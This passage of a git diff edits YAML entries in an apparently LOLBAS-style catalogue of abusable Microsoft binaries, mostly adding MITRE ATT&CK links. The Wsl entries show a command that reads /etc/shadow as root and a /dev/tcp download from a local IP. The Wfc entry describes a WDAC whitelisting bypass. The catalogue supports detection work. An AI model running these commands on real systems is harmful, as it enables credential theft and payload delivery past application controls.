- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
Code_Sample:
- Code:
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
@@ -27,4 +28,4 @@ Acknowledgement:
Handle: '@tifkin'
- Person: Jimmy
Handle: '@bohops'
---
---

3
yml/OtherMSBinaries/Vsjitdebugger.yml
View File

@@ -9,7 +9,8 @@ Commands:
Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: c:\windows\system32\vsjitdebugger.exe

9
yml/OtherMSBinaries/Wfc.yml
View File

@@ -9,13 +9,14 @@ Commands:
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
@@ -24,4 +25,4 @@ Acknowledgement:
Handle: '@mattifestation'
- Person: Jimmy
Handle: '@bohops'
---
---

1
yml/OtherMSBinaries/Winword.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe

4
yml/OtherMSBinaries/Wsl.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe -u root -e cat /etc/shadow
Description: Cats /etc/shadow file as root
@@ -17,6 +18,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat file'
Description: Cats /etc/shadow file as root
@@ -24,6 +26,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
@@ -31,6 +34,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server
Full_Path:
- Path: C:\Windows\System32\wsl.exe